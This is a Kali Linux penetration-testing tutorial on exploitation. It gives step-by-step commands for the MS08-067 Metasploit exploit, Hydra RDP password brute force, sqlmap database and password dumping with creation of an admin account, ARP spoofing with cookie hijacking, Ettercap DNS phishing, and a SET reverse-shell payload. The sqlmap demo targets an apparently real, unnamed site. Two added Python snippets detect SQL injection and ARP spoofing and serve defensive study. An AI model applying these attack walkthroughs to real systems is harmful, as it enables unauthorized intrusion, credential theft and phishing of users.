The exploit phase uses the information gathered earlier and the various attack methods to carry out the penetration. For a network application vulnerability assessment project, an assessment of encrypted-communication vulnerabilities must also be performed. As the name implies, the vulnerability is exploited to achieve the purpose of the attack.
- Metasploit Framework
- Rdesktop + Hydra
- Sqlmap
- Arpspoof
- Tcpdump + Ferret + Hamster
- Ettercap
- SET
Metasploit Framework
Metasploit is an open-source security vulnerability detection tool. The Metasploit Framework (MSF) was released as open source in 2003 and is a freely available development framework. It is a powerful open-source platform for developing, testing and using malicious code, an environment that provides a reliable platform for penetration testing, shellcode authoring and vulnerability research. This extensible model integrates payloads, encoders, no-operation generators (Nops) and exploits, which makes the Metasploit Framework a way to study high-risk vulnerabilities. It integrates common overflow vulnerabilities and popular shellcode for various platforms, and is constantly updated.
Overview: MSF architecture, components
Example Demo: Intruding into Windows XP SP3 (ms08_067)
MSF architecture
The Metasploit framework is not only a collection of exploits (overflows); it also lets you focus on creating your own overflow modules or on secondary development. A small part is implemented in assembler and C, and the rest is implemented in Ruby. Overall architecture:
- Tools: integrates a variety of utilities, most of them collected from other software.
- PLUGINS: a variety of plugins, most of them collected from other software. They call the API directly, but only work in the console.
- MODULES: the various modules of the current Metasploit Framework.
- MSF core: the basic API provided by the Metasploit framework core; it defines the framework of MSF and integrates the sub-systems together. Its organization is fragmented and changing it is not recommended.
- MSF Base: provides a number of extended, easy-to-use APIs for invocation; changes here are allowed.
- Rex LIBRARIES: the various libraries contained in the Metasploit Framework, i.e. collections of classes, methods and modules.
- CLI: the command line interface.
- GUI: the graphical user interface.
- Console: the console user interface.
- Web: the web page interface, currently no longer supported.
- Exploits: the exploit (overflow) modules; modules that do not carry a payload belong to Aux instead.
- Payload: code that can be dynamically run on a remote host.
- Nops: no-operation instructions used to generate buffer padding.
- Aux: modules for auxiliary attacks, such as port scanning tools.
- Encoders: re-encode payloads for anti-detection and similar purposes.
After connecting msfconsole to a database, the various modules can be queried more conveniently and quickly.
Start PostgreSQL first
sudo systemctl start postgresql
Switch to the postgres user
su postgres
Create a PostgreSQL database account
createuser -P root
Next you will be prompted for a password, then asked to confirm it
Create a database
createdb --owner=root nexp_db
The --owner parameter specifies the owner of the database, and the next parameter is the database name
Then exit and connect to the database from within MSF
db_connect root:<password>@localhost/nexp_db
After successful connection, you will be prompted:
[-] PostgreSQL already connected to MSF
[-] Run db_disconnect First If you wish to connect to a different database
msfconsole supports all system commands; enter help in the terminal to view "Core Commands", "Database Backend Commands" and "Exploit Commands".
Several vulnerability scanning components integrated with MSF
Nmap
Nmap runs on Windows, Linux, Mac and other operating systems. It is used for host discovery, port discovery or enumeration, service discovery, and detection of operating system, hardware address, software version and vulnerabilities. The Metasploit framework platform integrates Nmap. Before initiating an attack on the target system it is usually necessary to collect the required information, such as the active hosts on the network and the ports open on each host.
Nessus
Nessus is one of the most widely used vulnerability scanning tools today. Nessus uses a client/server model: the server side is responsible for the security checks, and the client is used to configure and manage the server side. The server also uses a plug-in system, allowing users to add plug-ins that perform specific functions, which allows for faster and more complex security checks.
Nmap for Port scanning
nmap -sS -v www.hdu.edu.cn -oX Desktop/out.xml
Import the saved scan results with the db_import command
db_import Desktop/out.xml
Use the hosts command to view the hosts contained in the XML scan results
Use the services command to view detailed service information for the open ports
Use the notes command to view details by port from the scan results
Example demo: MSF intrusion of WinXP (ms08_067). Environment:
- Windows XP SP3, ip: 172.16.211.129
- Kali Linux, ip: 172.16.211.128
Principle of experiment
Vulnerability name: Windows Server service RPC request buffer overflow vulnerability (MS08-067)
This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if a user receives a specially crafted RPC request on an affected system. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability to run arbitrary code without authentication. This vulnerability could be used for worm attacks. Firewall best practices and standard default firewall configurations help protect network resources from attacks originating outside the enterprise.
Experimental process
Search for the MS08-067 vulnerability in msfconsole using the search command
From the results, get
Name: exploit/windows/smb/ms08_067_netapi
Disclosure date: 2008-10-28
Rank: great
Description: MS08-067 Microsoft Server Service Relative Path Stack Corruption
Invoke the MS08-067 exploit module using the use command
use exploit/windows/smb/ms08_067_netapi
Use the show options command to see the options you need to set
You can see that RHOST (destination address) and Exploit Target (attack target) still need to be set
Set the module options using the set command; here the destination IP needs to be set, that is
set RHOST 172.16.211.129
Once set with the set command, you can use the show options command to view the settings
You can see that the target IP has been set.
Then set the exploit target; use show targets to view the options
You can see the versions of the system in which this vulnerability exists
Because the XP system in this example is WinXP SP3 Simplified Chinese, set the target with the set target command, that is
set target 34
Use show options to confirm that all settings are complete, then attack using exploit or run
After executing the exploit command, you get a Meterpreter session
Enter shell in Meterpreter to get a cmd window
You can then execute cmd commands, such as enabling the RDP service
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Use the netstat -an command to check whether the port is open; you can see that it is
Then use the net user command to view the users on the XP system
You can see that there is a user named sysorem
Then brute-force the login password for the specified user, here the sysorem user
hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
Hydra recovers the password 12345; you can then log in directly to XP for remote control
rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
Sqlmap
sqlmap is an automated SQL injection tool whose main function is to scan for, discover and exploit SQL injection vulnerabilities in a given URL. It currently supports MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB. Five distinct SQL injection techniques are used, namely:
1) Boolean-based blind injection, where the true or false outcome of the injected condition is determined from the returned page.
2) Time-based blind injection, where nothing can be judged from the page content, so a conditional time-delay statement is injected and the outcome is determined from whether the response time increases.
3) Error-based injection, where the page returns error information, or returns the result of the injected statement directly in the page.
4) UNION query injection, where the injection uses the UNION operator.
5) Stacked query injection, where multiple statements are executed at once in the injection.
Summary: a simple introduction to the common syntax
Example Demo: invading a server through an injection point
Common syntax introduction
Get the current user name
sqlmap -u "http://url/news?id=1" --current-user
Get the current database name
sqlmap -u "http://www.xxoo.com/news?id=1" --current-db
List table names
sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
List column fields
sqlmap -u "http://url/news?id=1" --columns -T "tablename" -D "db_name" -v 0
Get field contents
sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
Example demo: invading a server through one injection point
Target site: a CMS
Test for the presence of injection
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --level 2
Payload
SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b766271,0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d,0x716a786b71),NULL,NULL-- PHML&classsn=9003
Query the database user; ht_zhengke20% is returned
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --current-user
Query whether it is an administrator (DBA) account; True is returned
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --is-dba
List the databases
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --dbs
List the database users
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --users
List the database users' passwords
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --passwords
The ht_zhengke2 user's plaintext password is recovered: Ht_zhengke2
An Nmap scan found port 3389 open
Enter the SQL shell
sqlmap -u "http://xxx/newsInfo.php?news_id=1&classsn=8001" --sql-shell
Add a user from the SQL shell and elevate it to administrator
net user root 12345 /add
net localgroup Administrators root /add
Telnet to the server with the newly added user
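From the defender's side of this demo, the same activity leaves a clear trail in the web server's access log. The following is an added example, not part of the original tutorial: it scans constructed Apache combined-format log lines for sqlmap's default User-Agent and for the UNION/CONCAT, NULL-padding and tautology patterns of the payload shown above. The log lines, IP addresses and pattern names are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real traffic): a normal request,
# a probe sent with sqlmap's default User-Agent, and a UNION/CONCAT payload of the
# shape recovered in the demo above, URL-encoded as a server would log it.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /newsInfo.php?news_id=1&classsn=8001 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /newsInfo.php?news_id=1%20AND%201%3D1&classsn=8001 HTTP/1.1" 200 5120 "-" "sqlmap/1.3.11#stable (http://sqlmap.org)"
10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /newsInfo.php?news_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x716b766271%2C0x5a79%2C0x716a786b71%29%2CNULL%2CNULL--%20PHML&classsn=8001 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Heuristics applied to the URL-decoded request path; the name is the reason reported.
SQLI_PATTERNS = [
    ("union-select", re.compile(r"\bUNION\b.{0,40}\bSELECT\b", re.I)),
    ("null-padding", re.compile(r"(NULL\s*,\s*){3,}", re.I)),          # UNION column-count probing
    ("hex-concat",   re.compile(r"CONCAT\(\s*0x[0-9a-f]+", re.I)),     # sqlmap's hex marker strings
    ("tautology",    re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I)),  # boolean-blind tests
    ("comment-tail", re.compile(r"--\s|/\*")),                          # trailing SQL comment
]

def analyse_access_log(text):
    """Return a list of (ip, path, reasons) for each request that looks like SQL injection."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:                        # skip blank or differently formatted lines
            continue
        reasons = []
        if "sqlmap" in m["ua"].lower():
            reasons.append("sqlmap-ua")  # the default UA is a cheap but reliable indicator
        decoded = unquote_plus(m["path"])
        reasons += [name for name, rx in SQLI_PATTERNS if rx.search(decoded)]
        if reasons:
            hits.append((m["ip"], m["path"], reasons))
    return hits

if __name__ == "__main__":
    for ip, path, reasons in analyse_access_log(ACCESS_LOG):
        print(f"{ip} {', '.join(reasons)}\n    {path}")
```

A changed User-Agent defeats only the first check; the payload patterns still fire on the decoded request, which is why both are combined.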
Arpspoof
Because traffic on a LAN is forwarded according to MAC addresses rather than IP addresses, if the MAC address that host A holds for C is forged into a nonexistent MAC address, the network becomes unavailable and A cannot ping C. This is a simple ARP spoofing attack that exploits weaknesses of the ARP protocol. In intranet penetration it is often used together with other tools for network sniffing, traffic hijacking and similar purposes.
Example applications:
- ARP spoofing attacks and session hijacking
- ARP off-network attack
Command structure:
arpspoof [-i interface] [-t target] host
-i specifies the network interface (NIC), -t the target
ARP Spoofing attack
- Windows XP SP3, ip: 172.16.211.129
- Kali Linux, ip: 172.16.211.128
- Gateway, ip: 172.16.211.2
Turn on IP forwarding (use cat to check that the setting took effect)
echo 1 > /proc/sys/net/ipv4/ip_forward
Redirect the victim's traffic to the attacker
arpspoof -i eth0 -t 172.16.211.129 172.16.211.2
Tcpdump packet capture (Wireshark can also be used)
Because the spoofed gateway now forwards the traffic, the target host's traffic can be obtained simply by listening on the local network card.
Simple usage: tcpdump -w cookie.cap  # capture all traffic and write it to cookie.cap
Keep spoofing for a period of time while the victim casually browses some web pages, chats and so on, for example visiting the Digital HDU portal; after a while stop the spoofing, stop capturing packets, and process the captured traffic with ferret.
Simple usage: ferret -r cookie.cap  # process the captured traffic
Hamster
Make sure the processed cookie.cap is in the root user's home directory, then run hamster
Then set the browser proxy as prompted
Set the proxy in Kali's own Firefox browser
After the proxy is set, access hamster at http://127.0.0.1:1234 in the browser
Click the link on the left to access the site with the successfully hijacked cookies
ARP off-network attack
Turn off local IP forwarding; now when the traffic meant for the gateway arrives here it is not forwarded, so the target machine cannot get data from the gateway and is thus "off the network"
arpspoof -i eth0 172.16.211.1 172.16.211.128
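Both attacks above leave the same footprint on the wire: the gateway's IP suddenly answers from a second MAC, and with bidirectional spoofing one MAC claims several IPs. The following is an added detection example, not part of the original tutorial; it works over constructed "time ip mac" records of observed ARP replies (as a sniffer or periodic arp -a dump might produce), using the lab addresses from this section. The MAC addresses are constructed.

```python
from collections import defaultdict

GATEWAY_IP = "172.16.211.2"   # gateway from the lab environment above

# Constructed observations (not a real capture): the real gateway answers first,
# then a second MAC (the attacker's NIC) starts claiming the gateway's IP and,
# with bidirectional spoofing, the victim's IP as well.
ARP_LOG = """\
10:00:01 172.16.211.2 00:50:56:e1:aa:01
10:00:01 172.16.211.129 00:0c:29:11:22:33
10:00:02 172.16.211.128 00:0c:29:44:55:66
10:00:05 172.16.211.2 00:0c:29:44:55:66
10:00:06 172.16.211.129 00:0c:29:44:55:66
10:00:07 172.16.211.2 00:0c:29:44:55:66
"""

def parse_arp_log(text):
    """Yield (time, ip, mac) tuples, skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, ip, mac = parts
        yield ts, ip, mac.lower()

def detect_arp_spoof(text, gateway_ip=GATEWAY_IP):
    """Return alert strings for two symptoms of arpspoof-style poisoning:
    1. an IP seen with more than one MAC (its cached mapping was overwritten;
       HIGH when the IP is the gateway, MEDIUM otherwise), and
    2. one MAC claiming several IPs (impersonating gateway and victim at once).
    """
    ip_to_macs = defaultdict(list)   # ip -> distinct MACs in order of first sight
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in parse_arp_log(text):
        macs = ip_to_macs[ip]
        if macs and mac not in macs:
            sev = "HIGH" if ip == gateway_ip else "MEDIUM"
            alerts.append(f"{sev} {ts}: {ip} changed from {macs[-1]} to {mac}")
        if mac not in macs:
            macs.append(mac)
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"MEDIUM: {mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts

if __name__ == "__main__":
    print("\n".join(detect_arp_spoof(ARP_LOG)))
```

The same checks are what tools such as arpwatch apply continuously; a static gateway ARP entry on the hosts removes the first symptom entirely.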
Ettercap
Ettercap is a powerful spoofing tool that allows testers to create and send forged packets, from the network adapter level up to the application level, to bind listened-to data to a local port, and so on, all at great speed. It is an auxiliary tool commonly used in man-in-the-middle attacks.
For more information, interested readers can look into it on their own.
Example Demo: MITM DNS spoofing (phishing)
Configure DNS (/etc/ettercap/etter.dns) so that the spoofed domain resolves to 172.16.211.128, the local machine's LAN address
Turn on the local web service
Direct access will return the Apache default page
Use the command ettercap -G to start Ettercap and select Unified sniffing to configure the network card
Then scan for live hosts and open the Hosts list
Add the gateway address to Target1 and the attack target to Target2
Then set the man-in-the-middle attack in the form of ARP poisoning and set bidirectional spoofing
Then enable the dns_spoof plugin
Then start the DNS spoofing
Then, when www.hdu.edu.cn is browsed on the target host, the spoofing effect is achieved.
DNS spoofing is often used in network penetration to obtain administrator information, for phishing, and so on. For example, the intranet router's management page can be forged to trick the user into entering the real account and password on the fake management page.
SET
SET (the Social-Engineer Toolkit) is a tool set built on the theory of social engineering. It connects with Metasploit to automatically build attacks around Microsoft's latest vulnerabilities, Adobe PDF vulnerabilities, Java applet vulnerabilities and more, which can then be applied with social engineering techniques. It is not only easy to use but also good at deceiving ordinary users. It is therefore also an extremely dangerous tool.
Enter setoolkit in the shell to start SET, which can be used for social engineering, penetration testing and so on; option 1 is the social engineering attacks
Choose option 4 to create a payload and listener
Because the system used for the demo is WinXP 32-bit, option 2 is chosen as the connection method
Then set the local IP and port (the port is set to 4445 here to avoid collisions)
SET will then start MSF with the payload set above. When the user is induced to run it and connects back to port 4445 on the local machine, you get a Meterpreter session; in Meterpreter, enter ? to view the available commands
For example, screenshot takes a screenshot
Kali Linux Penetration Basics (III): Exploit